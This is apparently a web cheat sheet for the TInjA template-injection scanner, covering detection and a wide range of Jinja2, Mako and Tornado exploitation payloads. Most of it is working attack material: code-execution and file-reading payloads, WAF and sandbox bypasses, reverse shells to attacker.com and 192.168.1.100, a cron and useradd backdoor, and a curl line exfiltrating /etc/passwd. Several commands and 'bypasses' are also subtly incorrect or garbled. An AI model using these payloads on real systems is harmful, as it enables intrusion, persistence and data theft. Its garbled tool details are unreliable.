TInjA
Overview
Seção intitulada “Overview”TInjA (Template Injection Analyzer) is a specialized tool for identifying and exploiting Server-Side Template Injection (SSTI) vulnerabilities in web applications. It tests various template engines including Jinja2, Mako, Tornado, Genshi, Cheetah, and Twig by injecting payloads and analyzing responses to determine template engine type and exploit paths.
SSTI vulnerabilities allow attackers to inject template syntax into server-side template processors, potentially leading to arbitrary code execution, information disclosure, and complete system compromise.
Installation
Seção intitulada “Installation”From Kali Linux Repository
Seção intitulada “From Kali Linux Repository”sudo apt-get update
sudo apt-get install tinjaFrom Source
Seção intitulada “From Source”git clone https://github.com/Hackmanit/TInjA.git
cd TInjA
python3 -m pip install -r requirements.txtdocker run -it kalilinux/kali-rolling tinja --helpPython Package
Seção intitulada “Python Package”pip3 install tinjaBasic Usage
Seção intitulada “Basic Usage”| Command | Purpose |
|---|---|
tinja -url URL | Test single URL for SSTI |
tinja -u URL -p PARAM | Test specific parameter |
tinja -l FILE | Test URLs from file list |
tinja -o OUTPUT | Save results to file |
tinja --engine ENGINE | Target specific template engine |
tinja --exploit | Generate exploitation payload |
Command Options
Seção intitulada “Command Options”Target Specification
Seção intitulada “Target Specification”# Single URL testing
tinja -url "http://target.com/page?name=test"
# Specific parameter
tinja -url "http://target.com/page?name=test" -p name
# Custom HTTP method
tinja -url "http://target.com/api" --method POST
# POST data testing
tinja -url "http://target.com/form" --data "user=test&message=test"Advanced Options
Seção intitulada “Advanced Options”# Custom headers
tinja -url "http://target.com" -H "Authorization: Bearer token"
# Proxy configuration
tinja -url "http://target.com" --proxy "http://127.0.0.1:8080"
# SSL verification disable
tinja -url "https://target.com" --insecure
# Custom timeout
tinja -url "http://target.com" --timeout 30Template Engine Detection
Seção intitulada “Template Engine Detection”Detection Methods
Seção intitulada “Detection Methods”# Automatic engine detection
tinja -url "http://target.com/page?user=test"
# Output shows detected engine
# [+] Detected Template Engine: Jinja2
# [+] Vulnerability Type: SSTI| Template Engine | Common Parameters | File Location |
|---|---|---|
| Jinja2 | name, user, search, message | Flask, Django |
| Mako | template, view, page | Pyramid, Turbogears |
| Tornado | item, id, message | Tornado framework |
| Genshi | template, data, content | TurboGears |
| Cheetah | query, template, content | Older Python apps |
| Twig | data, template, page | PHP applications |
| Freemarker | object, model, data | Java applications |
Manual Engine Identification
Seção intitulada “Manual Engine Identification”# Test Jinja2-specific syntax
curl "http://target.com/page?user={{7*7}}"
# Jinja2 returns: 49
# Test Mako-specific syntax
curl "http://target.com/page?user=${7*7}"
# Mako returns: 49
# Test ERB (Ruby) syntax
curl "http://target.com/page?user=<%=7*7%>"
# ERB returns: 49SSTI Payload Testing
Seção intitulada “SSTI Payload Testing”Mathematical Expressions
Seção intitulada “Mathematical Expressions”# Basic arithmetic test
tinja -url "http://target.com/page?name={{7*7}}"
# Boolean logic test
tinja -url "http://target.com/page?name={{1==1}}"
# String concatenation test
tinja -url "http://target.com/page?name={{'hello'+'world'}}"Blind SSTI Detection
Seção intitulada “Blind SSTI Detection”# Time-based blind SSTI
tinja -url "http://target.com/page?name={{range(1000000)}}" --method GET
# String comparison blind test
tinja -url "http://target.com/page?name={%if 1==1%}A{%endif%}B"
# Output should show difference indicating template processingFilter Bypass Techniques
Seção intitulada “Filter Bypass Techniques”# Underscore bypass
{{request.__class__}}
# Bracket notation bypass
{{self[request.args.key]}}
# Concatenation bypass
{{"__cl"+"ass__"}}
# Unicode bypass
{{"__class__"}}
# Hex bypass
{{"\x5f\x5fclass\x5f\x5f"}}Code Execution Payloads
Seção intitulada “Code Execution Payloads”Jinja2 Exploitation
Seção intitulada “Jinja2 Exploitation”# Access object attributes
{{config}}
# File reading
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# Command execution
{{cycler.__init__.__globals__['os'].popen('whoami').read()}}
# Alternative RCE
{{''.join(request.args.get('cmd')|list)}}
# Reverse shell
tinja -url "http://target.com/page?cmd=nc -e /bin/sh attacker.com 4444"Mako Exploitation
Seção intitulada “Mako Exploitation”# Expression injection
${os.popen('id').read()}
# Python code execution
<%
import os
os.system('whoami')
%>
# File access
${open('/etc/passwd').read()}Tornado Exploitation
Seção intitulada “Tornado Exploitation”# Basic RCE
{%set cmd='id'%}{%set result=os.popen(cmd).read()%}
# Module import
{%import os%}${os.popen('whoami').read()}Information Gathering
Seção intitulada “Information Gathering”Extract Configuration Data
Seção intitulada “Extract Configuration Data”# Get config variables
tinja -url "http://target.com/page?name={{config}}" --exploit
# Access environment
tinja -url "http://target.com/page?name={{environ}}" --exploit
# List available globals
tinja -url "http://target.com/page?name={{globals()}}"File Reading
Seção intitulada “File Reading”# Read /etc/passwd
tinja -url "http://target.com/page?name={{open('/etc/passwd').read()}}"
# Read application files
tinja -url "http://target.com/page?name={{open('../../config.py').read()}}"
# Read environment files
tinja -url "http://target.com/page?name={{open('.env').read()}}"Source Code Disclosure
Seção intitulada “Source Code Disclosure”# Read template source
tinja -url "http://target.com/page?name={{self.module.__loader__.get_source(None, 'app')}}"
# Read Python files
tinja -url "http://target.com/page?name={{open('../app.py').read()}}"Exploitation Workflow
Seção intitulada “Exploitation Workflow”Step-by-Step Exploitation
Seção intitulada “Step-by-Step Exploitation”# 1. Identify vulnerability
tinja -url "http://target.com/page?user=test"
# 2. Detect template engine
# Output indicates Jinja2
# 3. Test basic payload
curl "http://target.com/page?user={{7*7}}"
# 4. Generate RCE payload
tinja -url "http://target.com/page?user=PAYLOAD" --exploit
# 5. Execute payload
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('id').read()}}"
# 6. Establish reverse shell
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('nc -e /bin/sh 192.168.1.100 4444').read()}}"Batch Testing from File
Seção intitulada “Batch Testing from File”# Create URL list
cat > urls.txt << EOF
http://target.com/page?name=test
http://target.com/search?q=test
http://target.com/user?id=1
EOF
# Test all URLs
tinja -l urls.txt -o results.txt
# Review findings
cat results.txtOutput Analysis
Seção intitulada “Output Analysis”Report Generation
Seção intitulada “Report Generation”# Save detailed report
tinja -url "http://target.com" -o report.txt
# JSON output format
tinja -url "http://target.com" -o report.json --format json
# HTML report
tinja -url "http://target.com" -o report.html --format htmlReport Contents
Seção intitulada “Report Contents”# View discovered vulnerabilities
grep -i "vulnerable\|ssti" report.txt
# Extract payload
grep -i "payload" report.txt
# List affected parameters
grep -i "parameter" report.txtAdvanced Techniques
Seção intitulada “Advanced Techniques”Bypassing Input Filters
Seção intitulada “Bypassing Input Filters”Bypassing Quotes
Seção intitulada “Bypassing Quotes”# String comparison without quotes
{{7*7}}
# Using chr() function
{{chr(72)+chr(101)+chr(108)+chr(108)+chr(111)}}
# Using request.args
{{request.args.get('x')}}Bypassing Blacklists
Seção intitulada “Bypassing Blacklists”# Case manipulation
{{request|safe}}
{{REQUEST|safe}}
# Comment injection
{{request/*bypass*/}}
# Null byte injection
{{request\x00}}
# Unicode normalization
{{request}}Concatenation Bypass
Seção intitulada “Concatenation Bypass”# Escaped concatenation
{{'__cla'+'ss__'}}
# Using format
{{'{}{}'.format('__class__')}}
# Using join
{{''.join(['__','class__'])}}WAF Evasion
Seção intitulada “WAF Evasion”# Obfuscate payload
{{().__class__.__bases__[0].__subclasses__()}}
# Use alternative methods
{{self.__init__.__globals__}}
# Fragment injection
{{requ
est}}
# Newline injection
{{request
.method}}Polyglot Payloads
Seção intitulada “Polyglot Payloads”# Works across multiple engines
{{7*7}}${7*7}<%= 7*7 %>
# Detects engine by response
tinja -url "http://target.com/page?name={{7*7}}" --engine autoPost-Exploitation
Seção intitulada “Post-Exploitation”Establish Persistence
Seção intitulada “Establish Persistence”# Create backdoor
tinja -url "http://target.com/page?name=PAYLOAD" --exploit
# Add cron job
{{os.popen('echo "* * * * * nc -e /bin/sh attacker.com 4444" | crontab -').read()}}
# Create user
{{os.popen('useradd -m -s /bin/bash backdoor').read()}}Data Exfiltration
Seção intitulada “Data Exfiltration”# Read sensitive files
tinja -url "http://target.com/page?name={{open('/var/www/config.php').read()}}"
# Exfiltrate to attacker server
{{os.popen('curl http://attacker.com?data=$(cat /etc/passwd|base64)').read()}}
# Encode output
{{os.popen('cat /etc/passwd | base64').read()}}Defensive Bypass
Seção intitulada “Defensive Bypass”Template Sandbox Escape
Seção intitulada “Template Sandbox Escape”# Access restricted globals
{{().__class__.__bases__[0].__subclasses__()}}
# Import modules in restricted environment
{{__import__('os').popen('id').read()}}
# Use __builtins__
{{__builtins__['eval']('7*7')}}Restricted Characters Bypass
Seção intitulada “Restricted Characters Bypass”# Avoid brackets
{{().__class__.__bases__.__getitem__(0)}}
# Use getattr
{{getattr(request, '__class__')}}
# Use globals
{{self.__init__.__globals__['__builtins__']}}Mitigation Verification
Seção intitulada “Mitigation Verification”Testing Fixes
Seção intitulada “Testing Fixes”# Verify input sanitization
tinja -url "http://target.com/page?name=<test>" -v
# Check output encoding
tinja -url "http://target.com/page?name={{7*7}}" -v
# Validate filter implementation
tinja -url "http://target.com/page?name={{__import__}}"Common Parameters to Test
Seção intitulada “Common Parameters to Test”# URL parameters
?name=test
?user=test
?search=test
?q=test
?id=1
?page=test
# POST fields
username=test
email=test
message=test
title=test
content=test
description=test
# Headers
User-Agent: test
Referer: test
X-Custom-Header: testAutomation Scripts
Seção intitulada “Automation Scripts”Continuous Testing
Seção intitulada “Continuous Testing”#!/bin/bash
# tinja-scan.sh - Automated SSTI scanning
while read url; do
echo "[*] Testing: $url"
tinja -url "$url" -o "results_$(date +%s).txt"
done < urls.txtIntegration with Burp Suite
Seção intitulada “Integration with Burp Suite”# Export Burp requests
# Use Burp to intercept requests
# Convert to tinja format for automated testing
tinja -l burp_export.txt -o burp_results.txtTroubleshooting
Seção intitulada “Troubleshooting”Common Issues
Seção intitulada “Common Issues”| Issue | Solution |
|---|---|
| No detection on known vulnerable app | Try different parameters, adjust timeout |
| False positives | Verify manually with browser, increase precision |
| Connection timeout | Adjust timeout value, check proxy settings |
| SSL errors | Use --insecure flag for self-signed certs |
| No output | Check URL format, verify target is running |
Debug Mode
Seção intitulada “Debug Mode”# Verbose output
tinja -url "http://target.com" -v
# Show all requests
tinja -url "http://target.com" --debug
# Save traffic log
tinja -url "http://target.com" --log traffic.logLegal and Ethical Considerations
Seção intitulada “Legal and Ethical Considerations”- Authorization Required: Only test systems you own or have explicit written permission to test
- Responsible Disclosure: Report findings to vendor/organization before public disclosure
- Compliance: Follow OWASP testing guidelines and legal requirements
- Documentation: Maintain detailed records of all testing activities
- Scope Limitation: Stay within defined testing scope and parameters
Resources
Seção intitulada “Resources”- OWASP SSTI: https://owasp.org/www-community/Server-Side_Template_Injection
- HackTricks SSTI: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
- TInjA GitHub: https://github.com/Hackmanit/TInjA
TInjA is essential for comprehensive web application security assessments, helping identify template injection vulnerabilities that can lead to complete system compromise.